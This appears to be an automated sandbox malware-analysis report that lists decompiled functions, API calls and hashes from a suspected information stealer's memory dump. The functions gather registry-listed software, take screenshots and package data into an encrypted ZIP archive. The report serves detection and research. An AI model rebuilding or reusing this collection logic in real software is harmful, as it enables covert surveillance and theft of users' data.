						if(_t60 == 0) {
							L5:
							 *(_t109 - 0x818) = 0x400;
							_t87 =  *0x432678; // 0xc16950
							_t62 = RegQueryValueExA( *(_t109 - 0x80c), _t87, 0, _t109 - 4, _t109 - 0xc18, _t109 - 0x818); // executed
							if(_t62 == 0) {
								L6:
								 *((intOrPtr*)(_t109 - 0x31964)) = _t109 - 0xc18;
								 *((intOrPtr*)(_t109 - 0x31968)) =  *((intOrPtr*)(_t109 - 0x31964)) + 1;
								do {
									L7:
									 *((char*)(_t109 - 0x31969)) =  *((intOrPtr*)( *((intOrPtr*)(_t109 - 0x31964))));
									 *((intOrPtr*)(_t109 - 0x31964)) =  *((intOrPtr*)(_t109 - 0x31964)) + 1;
								} while ( *((char*)(_t109 - 0x31969)) != 0);
								 *((intOrPtr*)(_t109 - 0x31970)) =  *((intOrPtr*)(_t109 - 0x31964)) -  *((intOrPtr*)(_t109 - 0x31968));
								if( *((intOrPtr*)(_t109 - 0x31970)) > 1) {
									L9:
									 *0x4328c4(_t109 - 0x31958, _t109 - 0xc18);
									 *(_t109 - 0x818) = 0x400;
									_t94 =  *0x432418; // 0xc168c0
									_t69 = RegQueryValueExA( *(_t109 - 0x80c), _t94, 0, _t109 - 4, _t109 - 0xc18, _t109 - 0x818); // executed
									if(_t69 == 0) {
										 *0x4328c4(_t109 - 0x31958, " ");
										 *0x4328c4(_t109 - 0x31958, _t109 - 0xc18);
									}
									L11:
									 *0x4328c4(_t109 - 0x31958, "\n");
								}
							}
							L12:
							RegCloseKey( *(_t109 - 0x80c));
							goto L13;
						} else {
							L4:
							_t96 =  *(_t109 - 0x80c);
							RegCloseKey( *(_t109 - 0x80c));
							RegCloseKey( *(_t109 - 0x810));
							_t53 = _t109 - 0x31958;
						}
					}
					L15:
					return E00404354(_t53, _t78,  *(_t109 - 8) ^ _t109, _t96, _t107, _t108);
					L16:
				}
				L14:
				_t96 =  *(_t109 - 0x810);
				RegCloseKey( *(_t109 - 0x810));
				_t53 = _t109 - 0x31958;
				goto L15;
			}

0x0041ad33
0x0041ad33
0x0041ad33
0x0041ad3c
0x0041ad49
0x00000000
0x00000000
0x0041ad4f
0x0041ad4f
0x0041ad7d
0x0041ad83
0x0041ad90
0x0041af23
0x00000000
0x0041ad96
0x0041ad96
0x0041adb0
0x0041add3
0x0041addb
0x0041ae02
0x0041ae02
0x0041ae20
0x0041ae2e
0x0041ae36
0x0041ae3c
0x0041ae42
0x0041ae51
0x0041ae57
0x0041ae57
0x0041ae5f
0x0041ae65
0x0041ae6c
0x0041ae81
0x0041ae8e
0x0041ae94
0x0041aea2
0x0041aea8
0x0041aec6
0x0041aed4
0x0041aedc
0x0041aeea
0x0041aefe
0x0041aefe
0x0041af04
0x0041af10
0x0041af10
0x0041ae8e
0x0041af16
0x0041af1d
0x00000000
0x0041addd
0x0041addd
0x0041addd
0x0041ade4
0x0041adf1
0x0041adf7
0x0041adf7
0x0041addb
0x0041af3b
0x0041af48
0x00000000
0x0041af48
0x0041af28
0x0041af28
0x0041af2f
0x0041af35
0x00000000

APIs

RegEnumKeyExA.KERNEL32(00000000,?,?,00000400,00000000,00000000,00000000,00000000), ref: 0041AD7D
wsprintfA.USER32 ref: 0041ADB0
RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020019,?), ref: 0041ADD3
RegCloseKey.ADVAPI32(?), ref: 0041ADE4
RegCloseKey.ADVAPI32(?), ref: 0041ADF1
RegQueryValueExA.KERNEL32(?,00C16950,00000000,000F003F,?,00000400), ref: 0041AE2E
lstrcat.KERNEL32(?,?), ref: 0041AEA2
RegQueryValueExA.KERNEL32(?,00C168C0,00000000,000F003F,?,00000400), ref: 0041AED4
lstrcat.KERNEL32(?,00429B9C), ref: 0041AEEA
lstrcat.KERNEL32(?,?), ref: 0041AEFE
lstrcat.KERNEL32(?,00429BA0), ref: 0041AF10
RegCloseKey.ADVAPI32(?), ref: 0041AF1D
RegCloseKey.ADVAPI32(00000000), ref: 0041AF2F

Strings

%s\%s, xrefs: 0041ADA4

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Closelstrcat$QueryValue$EnumOpenwsprintf
String ID: %s\%s
API String ID: 1306442838-4073750446
Opcode ID: 7e3b1e9eaef633de3c84d7d642d6c35276b624b8e4ffca11b8f592e78514d2a3
Instruction ID: f3428a77bd91617219cae783505e27cb4c8bfcd2f017827be334a9b1ae9db7bc
Opcode Fuzzy Hash: 7e3b1e9eaef633de3c84d7d642d6c35276b624b8e4ffca11b8f592e78514d2a3
Instruction Fuzzy Hash: 66214DB490122C9BDB64DB50DC85BE9B3BCFF48304F0491EAA24966180DB745AC5CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A720, Relevance: 10.6, APIs: 7, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E0041A720(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				char _v276;
				char _v540;
				signed int _t10;
				void* _t16;
				long _t17;
				CHAR* _t18;
				void* _t22;
				char* _t32;
				signed int _t35;

				_t10 =  *0x4301f4; // 0x3b2bc12f
				_v8 = _t10 ^ _t35;
				E004091C0( &_v276, 0, 0x104);
				E004091C0( &_v540, 0, 0x104);
				_push(_a4);
				_t16 = E0041A600(GetCurrentProcessId()); // executed
				_t17 = GetCurrentProcessId();
				_t18 =  *0x4322cc; // 0xc17500
				wsprintfA( &_v276, _t18, _t17);
				GetCurrentDirectoryA(0x104,  &_v540);
				_t32 =  *0x432634; // 0xc17148
				_t22 = ShellExecuteA(0, 0, _t32,  &_v276,  &_v540, 0); // executed
				return E00404354(_t22, __ebx, _v8 ^ _t35, _t32, __edi, __esi, _t16);
			}

0x0041a729
0x0041a730
0x0041a741
0x0041a757
0x0041a762
0x0041a76a
0x0041a773
0x0041a77a
0x0041a787
0x0041a79c
0x0041a7b2
0x0041a7bd
0x0041a7d0

APIs

_memset.LIBCMT ref: 0041A741
_memset.LIBCMT ref: 0041A757
GetCurrentProcessId.KERNEL32(?), ref: 0041A763

Part of subcall function 0041A600: OpenProcess.KERNEL32(00000410,00000000,?), ref: 0041A61E
Part of subcall function 0041A600: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 0041A63F
Part of subcall function 0041A600: CloseHandle.KERNEL32(00000000), ref: 0041A649

GetCurrentProcessId.KERNEL32(00000000), ref: 0041A773
wsprintfA.USER32 ref: 0041A787
GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0041A79C
ShellExecuteA.SHELL32(00000000,00000000,00C17148,?,?,00000000), ref: 0041A7BD

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CurrentProcess$_memset$CloseDirectoryExecuteFileHandleModuleNameOpenShellwsprintf
String ID:
API String ID: 2405513257-0
Opcode ID: baf83078a686ac06e6fc9f2a6dcaae8c194dc191c1c4b6f6066e0c50a55cede3
Instruction ID: d69d9e76eef0e66095736d82ead0aa8f23bf222a92cc1a2a572ef11dcdc1f2d9
Opcode Fuzzy Hash: baf83078a686ac06e6fc9f2a6dcaae8c194dc191c1c4b6f6066e0c50a55cede3
Instruction Fuzzy Hash: BD11CCF1940208ABD708EBA0DD8AFDA737CAB5C704F0002A8B705961D1DEB49A84CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A940, Relevance: 10.5, APIs: 7, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A940(int _a4, int _a8, int _a12, int _a16) {
				struct HDC__* _v8;
				struct HBITMAP__* _v12;
				void* _t26;
				void* _t36;

				_v8 = CreateCompatibleDC(0);
				_v12 = CreateCompatibleBitmap(GetDC(0), _a12, _a16);
				SelectObject(_v8, _v12);
				BitBlt(_v8, 0, 0, _a12, _a16, GetDC(0), _a4, _a8, 0xcc0020);
				E0041A7E0(_t26, _t36, _v12, 0x46); // executed
				return DeleteObject(_v12);
			}

0x0041a94e
0x0041a968
0x0041a973
0x0041a99f
0x0041a9ab
0x0041a9c0

APIs

CreateCompatibleDC.GDI32(00000000), ref: 0041A948
GetDC.USER32(00000000), ref: 0041A95B
CreateCompatibleBitmap.GDI32(00000000), ref: 0041A962
SelectObject.GDI32(?,?), ref: 0041A973
GetDC.USER32(00000000), ref: 0041A988
BitBlt.GDI32(?,00000000,00000000,?,?,00000000), ref: 0041A99F
DeleteObject.GDI32(?), ref: 0041A9B7

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CompatibleCreateObject$BitmapDeleteSelect
String ID:
API String ID: 2649417129-0
Opcode ID: 8da025cf27b9162b199af851bde644c4301ccdb8fd0549fef43d9250407ed98f
Instruction ID: 221383f7ee6d196ab81c3e677e1672781a4a52126109af141504c3ea2f6f6f90
Opcode Fuzzy Hash: 8da025cf27b9162b199af851bde644c4301ccdb8fd0549fef43d9250407ed98f
Instruction Fuzzy Hash: 8F010CB6A40208BFDB44DFE4ED49F9E7BB8FB4C701F108158FA09D7280D6B1A9108B65

Uniqueness

Uniqueness Score: -1.00%

Function 004188D0, Relevance: 9.4, APIs: 3, Strings: 2, Instructions: 694
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E004188D0(void* __ebx, signed int* __ecx, void* __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				char _v13;
				char _v24;
				signed int _v28;
				signed int _v32;
				signed int _v33;
				signed int _v34;
				char _v48;
				char _v316;
				signed int _v320;
				signed int _v321;
				signed int _v328;
				void* _v332;
				char _v336;
				char _v337;
				char _v338;
				char _v339;
				char _v340;
				char _v341;
				char _v342;
				char _v343;
				char _v344;
				char _v345;
				char _v346;
				char _v347;
				char _v348;
				char _v349;
				char _v350;
				char _v351;
				char _v352;
				signed int _v360;
				signed int _v364;
				signed int _v372;
				char _v632;
				char _v892;
				signed int _v896;
				signed int _v900;
				signed int _v904;
				char _v1164;
				intOrPtr _v1168;
				signed int _v1172;
				short _v1176;
				short _v1178;
				short _v1180;
				signed int _v1184;
				signed int _v1188;
				signed int _v1192;
				signed int _v1196;
				signed int _v1200;
				signed int _v1204;
				signed int _v1208;
				unsigned int _v1212;
				signed int _v1214;
				signed int _v1216;
				short _v1218;
				char _v1220;
				signed int _v1224;
				signed int _v1228;
				signed char* _v1232;
				signed int _v1236;
				signed int _v1240;
				signed int _v1244;
				signed int _v1248;
				void* _v1252;
				signed int* _v1256;
				signed int _v1260;
				char* _v1264;
				intOrPtr _v1268;
				char _v1269;
				intOrPtr* _v1276;
				signed int _v1280;
				char _v1281;
				intOrPtr _v1288;
				signed int _v1292;
				intOrPtr* _v1296;
				char* _v1300;
				intOrPtr _v1304;
				char _v1305;
				intOrPtr* _v1312;
				signed int _v1316;
				char _v1317;
				signed int _v1324;
				signed int _v1328;
				char _v1329;
				signed int _v1336;
				signed int _v1340;
				void* __edi;
				void* __esi;
				signed int _t417;
				signed int _t429;
				char _t432;
				signed int _t466;
				signed int _t469;
				signed int* _t472;
				signed char _t503;
				signed int _t505;
				signed char _t507;
				signed int _t510;
				signed char _t516;
				signed int _t518;
				signed int _t522;
				signed int _t523;
				signed int _t536;
				signed int _t540;
				signed char _t541;
				signed int _t544;
				void* _t548;
				signed int* _t550;
				char _t567;
				intOrPtr* _t589;
				signed int* _t604;
				signed int _t612;
				signed int _t623;
				signed int _t630;
				signed int _t636;
				signed int* _t640;
				intOrPtr _t649;
				signed int _t662;
				signed int _t707;
				signed int _t720;
				signed int _t725;
				intOrPtr _t726;
				signed int _t736;
				void* _t737;
				void* _t738;

				_t548 = __ebx;
				_t417 =  *0x4301f4; // 0x3b2bc12f
				_v12 = _t417 ^ _t736;
				_v1256 = __ecx;
				if(_v1256[5] == 0) {
					_t550 = _v1256;
					__eflags =  *(_t550 + 0x2c) & 0x000000ff;
					if(( *(_t550 + 0x2c) & 0x000000ff) == 0) {
						_v328 = 0;
						__eflags =  *_v1256;
						if( *_v1256 != 0) {
							__eflags = _a16 - 4;
							if(_a16 != 4) {
								_v328 = 0xc;
							}
						}
						_v1260 = _a4;
						_v1264 =  &_v316;
						_v1268 = _v1264;
						do {
							_v1269 =  *_v1260;
							 *_v1264 = _v1269;
							_t656 = _v1260 + 1;
							_v1260 = _v1260 + 1;
							_v1264 = _v1264 + 1;
							__eflags = _v1269;
						} while (_v1269 != 0);
						__eflags = _v316;
						if(_v316 != 0) {
							_t656 =  &_v316;
							_v1228 =  &_v316;
							while(1) {
								__eflags =  *_v1228;
								if( *_v1228 == 0) {
									break;
								}
								__eflags =  *_v1228 - 0x5c;
								if( *_v1228 == 0x5c) {
									 *_v1228 = 0x2f;
								}
								_t656 = _v1228 + 1;
								_v1228 = _v1228 + 1;
							}
							__eflags = _a16 - 4;
							_v33 = 0 | _a16 == 0x00000004;
							__eflags = _v33 & 0x000000ff;
							if((_v33 & 0x000000ff) == 0) {
								L21:
								_v1292 = 0;
								L22:
								_v34 = _v1292;
								_v32 = 8;
								__eflags = _v33 & 0x000000ff;
								if((_v33 & 0x000000ff) != 0) {
									L24:
									_v32 = 0;
									L25:
									__eflags = _a16 - 2;
									if(_a16 != 2) {
										__eflags = _a16 - 1;
										if(_a16 != 1) {
											__eflags = _a16 - 3;
											if(_a16 != 3) {
												__eflags = _a16 - 4;
												if(__eflags != 0) {
													_t429 = 0x10000;
													L118:
													return E00404354(_t429, _t548, _v12 ^ _t736, _t656, _t731, _t734);
												}
												_v28 = E00414B50(_t548, _v1256, _t731, _t734, __eflags);
												L34:
												__eflags = _v28;
												if(_v28 == 0) {
													_v360 = 0;
													_t432 =  *0x4292cf; // 0x0
													_v1164 = _t432;
													_v1296 =  &_v316;
													_v1300 =  &_v892;
													_v1304 = _v1300;
													do {
														_v1305 =  *_v1296;
														 *_v1300 = _v1305;
														_v1296 = _v1296 + 1;
														_v1300 = _v1300 + 1;
														__eflags = _v1305;
													} while (_v1305 != 0);
													_v1312 =  &_v892;
													_t662 = _v1312 + 1;
													__eflags = _t662;
													_v1316 = _t662;
													do {
														_v1317 =  *_v1312;
														_v1312 = _v1312 + 1;
														__eflags = _v1317;
													} while (_v1317 != 0);
													_v1324 = _v1312 - _v1316;
													_v1196 = _v1324;
													__eflags = _v34 & 0x000000ff;
													if((_v34 & 0x000000ff) == 0) {
														L44:
														_t567 =  *0x4293ad; // 0x0
														_v632 = _t567;
														_v904 = 0;
														_v1192 = 0;
														_v900 = 0;
														_v1188 = 0;
														_v896 = 0;
														_v1184 = 0;
														_v372 = 1;
														_v364 = 0;
														_v1178 = 0;
														_v1220 = 0xb17;
														_v1218 = 0x14;
														_v1212 = _v1256[0x1a];
														_v1208 = 0;
														_v1216 = 8;
														__eflags =  *_v1256;
														if( *_v1256 != 0) {
															__eflags = _v33 & 0x000000ff;
															if((_v33 & 0x000000ff) == 0) {
																_v1216 = 9;
															}
														}
														_v1176 = _v1216;
														_v1214 = _v32;
														__eflags = _v32;
														if(_v32 != 0) {
															L50:
															_v1336 = 0;
															goto L51;
														} else {
															_t640 = _v1256;
															__eflags =  *(_t640 + 0x70);
															if( *(_t640 + 0x70) < 0) {
																goto L50;
															}
															_v1336 = _v1256[0x1c] + _v328;
															L51:
															_v1204 = _v1336;
															_v1200 = _v1256[0x1c];
															_v1180 = 0;
															_v1172 = _v1256[0x13];
															_v1168 = _v1256[6] + _v1256[4];
															_v904 =  &_v352;
															_v1192 = 0x11;
															_v900 =  &_v48;
															_v1188 = 9;
															_v352 = 0x55;
															_v351 = 0x54;
															_v350 = 0xd;
															_v349 = 0;
															_v348 = 7;
															_v347 = _v1256[0x16];
															_v346 = E00425690(_v1256[0x16], 8, _v1256[0x17]);
															_v345 = E00425690(_v1256[0x16], 0x10, _v1256[0x17]);
															_v344 = E00425690(_v1256[0x16], 0x18, _v1256[0x17]);
															_v343 = _v1256[0x14];
															_v342 = E00425690(_v1256[0x14], 8, _v1256[0x15]);
															_v341 = E00425690(_v1256[0x14], 0x10, _v1256[0x15]);
															_v340 = E00425690(_v1256[0x14], 0x18, _v1256[0x15]);
															_v339 = _v1256[0x18];
															_v338 = E00425690(_v1256[0x18], 8, _v1256[0x19]);
															_v337 = E00425690(_v1256[0x18], 0x10, _v1256[0x19]);
															_v336 = E00425690(_v1256[0x18], 0x18, _v1256[0x19]);
															_t466 = _v904;
															_t589 = _v900;
															 *_t589 =  *_t466;
															 *((intOrPtr*)(_t589 + 4)) =  *((intOrPtr*)(_t466 + 4));
															 *((char*)(_t589 + 8)) =  *((intOrPtr*)(_t466 + 8));
															 *((char*)(_v900 + 2)) = 5;
															_t656 = _v1256;
															_t469 = E00413C90( &_v1220, E00417110, _v1256); // executed
															_t738 = _t737 + 0xc;
															_v1224 = _t469;
															__eflags = _v1224;
															if(_v1224 == 0) {
																_t656 = _v1256;
																_v1256[6] = _v1196 + _v1192 + 0x1e + _v1256[6];
																_t472 = _v1256;
																__eflags =  *(_t472 + 0x14);
																if( *(_t472 + 0x14) == 0) {
																	_v1256[0xc] = 0x12345678;
																	_v1256[0xd] = 0x23456789;
																	_v1256[0xe] = 0x34567890;
																	_v1232 =  *_v1256;
																	while(1) {
																		__eflags = _v1232;
																		if(_v1232 == 0) {
																			break;
																		}
																		__eflags =  *_v1232;
																		if( *_v1232 == 0) {
																			break;
																		}
																		E00412FE0( &(_v1256[0xc]),  *_v1232 & 0x000000ff);
																		_t738 = _t738 + 8;
																		_t636 =  &(_v1232[1]);
																		__eflags = _t636;
																		_v1232 = _t636;
																	}
																	__eflags =  *0x432aac & 0x000000ff;
																	if(( *0x432aac & 0x000000ff) == 0) {
																		_t522 = GetTickCount();
																		_t523 = GetDesktopWindow();
																		_t734 = _t522 ^ _t523;
																		__eflags = _t522 ^ _t523;
																		E00406DA4(_t522 ^ _t523);
																		_t738 = _t738 + 4;
																	}
																	_v1236 = 0;
																	while(1) {
																		__eflags = _v1236 - 0xc;
																		if(__eflags >= 0) {
																			break;
																		}
																		 *((char*)(_t736 + _v1236 - 0x14)) = E00406DB6(__eflags) >> 0x00000007 & 0x000000ff;
																		_t720 = _v1236 + 1;
																		__eflags = _t720;
																		_v1236 = _t720;
																	}
																	_v13 = _v1212 >> 0x00000008 & 0x000000ff;
																	_v1240 = 0;
																	while(1) {
																		__eflags = _v1240 - 0xc;
																		if(__eflags >= 0) {
																			break;
																		}
																		_t516 = E00415150(_v1240, __eflags,  &(_v1256[0xc]),  *(_t736 + _v1240 - 0x14) & 0x000000ff);
																		_t738 = _t738 + 8;
																		 *(_t736 + _v1240 - 0x14) = _t516;
																		_t518 = _v1240 + 1;
																		__eflags = _t518;
																		_v1240 = _t518;
																	}
																	__eflags =  *_v1256;
																	if( *_v1256 != 0) {
																		__eflags = _v33 & 0x000000ff;
																		if((_v33 & 0x000000ff) == 0) {
																			E00417110( &_v24, _v1256,  &_v24, 0xc);
																			_t738 = _t738 + 0xc;
																			_t630 = _v1256[6] + 0xc;
																			__eflags = _t630;
																			_v1256[6] = _t630;
																		}
																	}
																	_v8 = 0;
																	__eflags =  *_v1256;
																	if( *_v1256 == 0) {
																		L76:
																		_v1340 = 0;
																		goto L77;
																	} else {
																		__eflags = _v33 & 0x000000ff;
																		if((_v33 & 0x000000ff) != 0) {
																			goto L76;
																		}
																		_v1340 = 1;
																		L77:
																		_v1256[0xb] = _v1340;
																		__eflags = _v33 & 0x000000ff;
																		if((_v33 & 0x000000ff) != 0) {
																			L80:
																			__eflags = _v33 & 0x000000ff;
																			if((_v33 & 0x000000ff) != 0) {
																				L83:
																				__eflags = _v33 & 0x000000ff;
																				if((_v33 & 0x000000ff) != 0) {
																					_v1256[0x24] = 0;
																				}
																				L85:
																				_v1256[0xb] = 0;
																				E00412B90(_v1256);
																				_v1256[6] = _v1256[6] + _v1256[0x24];
																				_t656 = _v1256;
																				__eflags =  *(_t656 + 0x14);
																				if( *(_t656 + 0x14) == 0) {
																					__eflags = _v8;
																					if(_v8 == 0) {
																						__eflags = _v1204 - _v1256[0x24] + _v328;
																						_v321 = 0 | _v1204 == _v1256[0x24] + _v328;
																						_v1208 = _v1256[0x1e];
																						_v1204 = _v1256[0x24] + _v328;
																						_v1200 = _v1256[0x1c];
																						_t604 = _v1256;
																						__eflags =  *(_t604 + 0x1c) & 0x000000ff;
																						if(( *(_t604 + 0x1c) & 0x000000ff) == 0) {
																							L101:
																							_t656 = _v1214 & 0x0000ffff;
																							__eflags = (_v1214 & 0x0000ffff) - (_v32 & 0x0000ffff);
																							if((_v1214 & 0x0000ffff) == (_v32 & 0x0000ffff)) {
																								__eflags = _v32;
																								if(_v32 != 0) {
																									L106:
																									_t656 = _v1256;
																									_v1224 = E00413AA0( &_v1220, E00417110, _v1256);
																									__eflags = _v1224;
																									if(_v1224 == 0) {
																										_t707 = _v1256[6] + 0x10;
																										__eflags = _t707;
																										_v1256[6] = _t707;
																										_v1216 = _v1176;
																										L109:
																										_t656 = _v1256;
																										__eflags = _v1256[5];
																										if(__eflags == 0) {
																											_v1248 = E00404E60(_t731, _t734, __eflags, _v1188);
																											_v320 = _v1248;
																											E00409240(_v320, _v900, _v1188);
																											_v900 = _v320;
																											_v1252 = E00404E60(_t731, _t734, __eflags, 0x360);
																											_v332 = _v1252;
																											_t734 =  &_v1220;
																											memcpy(_v332, _t734, 0xd8 << 2);
																											_t731 = _t734 + 0x1b0;
																											_t656 = _v1256;
																											__eflags =  *(_t656 + 0x44);
																											if( *(_t656 + 0x44) != 0) {
																												_v1244 = _v1256[0x11];
																												while(1) {
																													_t612 = _v1244;
																													__eflags =  *(_t612 + 0x35c);
																													if( *(_t612 + 0x35c) == 0) {
																														break;
																													}
																													_v1244 =  *((intOrPtr*)(_v1244 + 0x35c));
																												}
																												_t656 = _v332;
																												 *((intOrPtr*)(_v1244 + 0x35c)) = _v332;
																												L117:
																												_t429 = 0;
																												__eflags = 0;
																												goto L118;
																											}
																											_v1256[0x11] = _v332;
																											goto L117;
																										}
																										_t429 = _v1256[5];
																										goto L118;
																									}
																									_t429 = 0x400;
																									goto L118;
																								}
																								__eflags = _v321 & 0x000000ff;
																								if((_v321 & 0x000000ff) != 0) {
																									goto L106;
																								}
																								_t429 = 0x4000000;
																								goto L118;
																							}
																							_t429 = 0x4000000;
																							goto L118;
																						}
																						__eflags =  *_v1256;
																						if( *_v1256 == 0) {
																							L92:
																							_v1214 = _v32;
																							__eflags = _v1216 & 1;
																							if((_v1216 & 1) == 0) {
																								_t623 = _v1216 & 0xfff7;
																								__eflags = _t623;
																								_v1216 = _t623;
																							}
																							_v1176 = _v1216;
																							_t503 = E00412C20(_v1256, _v1168 - _v1256[4]); // executed
																							_t656 = _t503 & 0x000000ff;
																							__eflags = _t503 & 0x000000ff;
																							if((_t503 & 0x000000ff) != 0) {
																								_t505 = E00413C90( &_v1220, E00417110, _v1256); // executed
																								_v1224 = _t505;
																								__eflags = _v1224;
																								if(_v1224 == 0) {
																									_t656 = _v1256;
																									_t507 = E00412C20(_v1256, _v1256[6]); // executed
																									__eflags = _t507 & 0x000000ff;
																									if((_t507 & 0x000000ff) != 0) {
																										goto L109;
																									}
																									_t429 = 0x2000000;
																									goto L118;
																								}
																								_t429 = 0x400;
																							} else {
																								_t429 = 0x2000000;
																							}
																							goto L118;
																						}
																						__eflags = _v33 & 0x000000ff;
																						if((_v33 & 0x000000ff) == 0) {
																							goto L101;
																						}
																						goto L92;
																					}
																					_t429 = 0x400;
																					goto L118;
																				}
																				_t429 = _v1256[5];
																				goto L118;
																			}
																			__eflags = _v32;
																			if(__eflags != 0) {
																				goto L83;
																			}
																			_v8 = E00417800(_v1256, _t731, _t734, __eflags);
																			goto L85;
																		}
																		__eflags = _v32 - 8;
																		if(_v32 != 8) {
																			goto L80;
																		}
																		_t510 = E00418760(_t548, _v1256, _t731, _t734,  &_v1220); // executed
																		_v8 = _t510;
																		goto L85;
																	}
																}
																E00412B90(_v1256);
																_t429 = _v1256[5];
																goto L118;
															}
															E00412B90(_v1256);
															_t429 = 0x400;
															goto L118;
														}
													}
													_t725 =  &_v892 + 0xffffffff;
													__eflags = _t725;
													_v1328 = _t725;
													do {
														_v1329 =  *((intOrPtr*)(_v1328 + 1));
														_v1328 = _v1328 + 1;
														__eflags = _v1329;
													} while (_v1329 != 0);
													_t731 = _v1328;
													_t726 =  *0x429b2c; // 0x2f
													 *_v1328 = _t726;
													_t536 = _v1196 + 1;
													__eflags = _t536;
													_v1196 = _t536;
													goto L44;
												}
												_t429 = _v28;
												goto L118;
											}
											_t656 = _a8;
											_v28 = E00414C60(_t548, _v1256, _t731, _t734, _a8, _a12);
											goto L34;
										}
										_t656 = _a12;
										_v28 = E00416D00(_t548, _v1256, _t731, _t734, _a8, _a12);
										goto L34;
									}
									_t540 = E00416EC0(_v1256, _a8); // executed
									_v28 = _t540;
									goto L34;
								}
								_t656 =  &_v316;
								_t541 = E00415000( &_v316);
								_t737 = _t737 + 4;
								__eflags = _t541 & 0x000000ff;
								if((_t541 & 0x000000ff) == 0) {
									goto L25;
								}
								goto L24;
							}
							_v1276 =  &_v316;
							_t544 = _v1276 + 1;
							__eflags = _t544;
							_v1280 = _t544;
							do {
								_v1281 =  *_v1276;
								_v1276 = _v1276 + 1;
								__eflags = _v1281;
							} while (_v1281 != 0);
							_v1288 = _v1276 - _v1280;
							_t649 = _v1288;
							_t656 =  *((char*)(_t736 + _t649 - 0x139));
							__eflags =  *((char*)(_t736 + _t649 - 0x139)) - 0x2f;
							if( *((char*)(_t736 + _t649 - 0x139)) == 0x2f) {
								goto L21;
							}
							_v1292 = 1;
							goto L22;
						}
						_t429 = 0x10000;
						goto L118;
					}
					_t429 = 0x50000;
					goto L118;
				}
				_t429 = 0x40000;
				goto L118;
			}

0x004188d0
0x004188d9
0x004188e0
0x004188e5
0x004188f5
0x00418901
0x0041890b
0x0041890d
0x00418919
0x00418929
0x0041892c
0x0041892e
0x00418932
0x00418934
0x00418934
0x00418932
0x00418941
0x0041894d
0x00418959
0x0041895f
0x00418967
0x00418979
0x00418981
0x00418984
0x00418993
0x00418999
0x00418999
0x004189a9
0x004189ab
0x004189b7
0x004189bd
0x004189c3
0x004189cc
0x004189ce
0x00000000
0x00000000
0x004189d9
0x004189dc
0x004189e4
0x004189e4
0x004189ed
0x004189f0
0x004189f0
0x004189fa
0x00418a01
0x00418a08
0x00418a0a
0x00418a76
0x00418a76
0x00418a80
0x00418a86
0x00418a89
0x00418a94
0x00418a96
0x00418aae
0x00418aae
0x00418ab5
0x00418ab5
0x00418ab9
0x00418acf
0x00418ad3
0x00418aed
0x00418af1
0x00418b0b
0x00418b0f
0x00418b21
0x004194f7
0x00419504
0x00419504
0x00418b1c
0x00418b2b
0x00418b2b
0x00418b2f
0x00418b39
0x00418b43
0x00418b48
0x00418b54
0x00418b60
0x00418b6c
0x00418b72
0x00418b7a
0x00418b8c
0x00418b97
0x00418ba6
0x00418bac
0x00418bac
0x00418bbb
0x00418bc7
0x00418bc7
0x00418bca
0x00418bd0
0x00418bd8
0x00418bde
0x00418be5
0x00418be5
0x00418bfa
0x00418c06
0x00418c10
0x00418c12
0x00418c61
0x00418c61
0x00418c67
0x00418c6d
0x00418c77
0x00418c81
0x00418c8b
0x00418c95
0x00418c9f
0x00418ca9
0x00418cb3
0x00418cbf
0x00418ccb
0x00418cd7
0x00418ce7
0x00418ced
0x00418cfc
0x00418d09
0x00418d0c
0x00418d12
0x00418d14
0x00418d1b
0x00418d1b
0x00418d14
0x00418d29
0x00418d34
0x00418d3b
0x00418d3f
0x00418d64
0x00418d64
0x00000000
0x00418d41
0x00418d41
0x00418d47
0x00418d4b
0x00000000
0x00000000
0x00418d5c
0x00418d6e
0x00418d74
0x00418d83
0x00418d8b
0x00418d9b
0x00418db3
0x00418dbf
0x00418dc5
0x00418dd2
0x00418dd8
0x00418de2
0x00418de9
0x00418df0
0x00418df7
0x00418dfe
0x00418e0e
0x00418e27
0x00418e40
0x00418e59
0x00418e68
0x00418e81
0x00418e9a
0x00418eb3
0x00418ec2
0x00418edb
0x00418ef4
0x00418f0d
0x00418f13
0x00418f19
0x00418f21
0x00418f26
0x00418f2c
0x00418f35
0x00418f39
0x00418f4c
0x00418f51
0x00418f54
0x00418f5a
0x00418f61
0x00418f91
0x00418f97
0x00418f9a
0x00418fa0
0x00418fa4
0x00418fc5
0x00418fd2
0x00418fdf
0x00418fee
0x00419005
0x00419005
0x0041900c
0x00000000
0x00000000
0x00419017
0x00419019
0x00000000
0x00000000
0x0041902f
0x00419034
0x00418ffc
0x00418ffc
0x00418fff
0x00418fff
0x00419040
0x00419042
0x00419044
0x0041904c
0x00419052
0x00419052
0x00419055
0x0041905a
0x0041905a
0x0041905d
0x00419078
0x00419078
0x0041907f
0x00000000
0x00000000
0x00419094
0x0041906f
0x0041906f
0x00419072
0x00419072
0x004190a9
0x004190ac
0x004190c7
0x004190c7
0x004190ce
0x00000000
0x00000000
0x004190e6
0x004190eb
0x004190f4
0x004190be
0x004190be
0x004190c1
0x004190c1
0x00419100
0x00419103
0x00419109
0x0041910b
0x0041911a
0x0041911f
0x0041912b
0x0041912b
0x00419134
0x00419134
0x0041910b
0x00419137
0x00419144
0x00419147
0x0041915d
0x0041915d
0x00000000
0x00419149
0x0041914d
0x0041914f
0x00000000
0x00000000
0x00419151
0x00419167
0x00419173
0x0041917a
0x0041917c
0x0041919b
0x0041919f
0x004191a1
0x004191b9
0x004191bd
0x004191bf
0x004191c7
0x004191c7
0x004191d1
0x004191d7
0x004191e1
0x00419201
0x00419204
0x0041920a
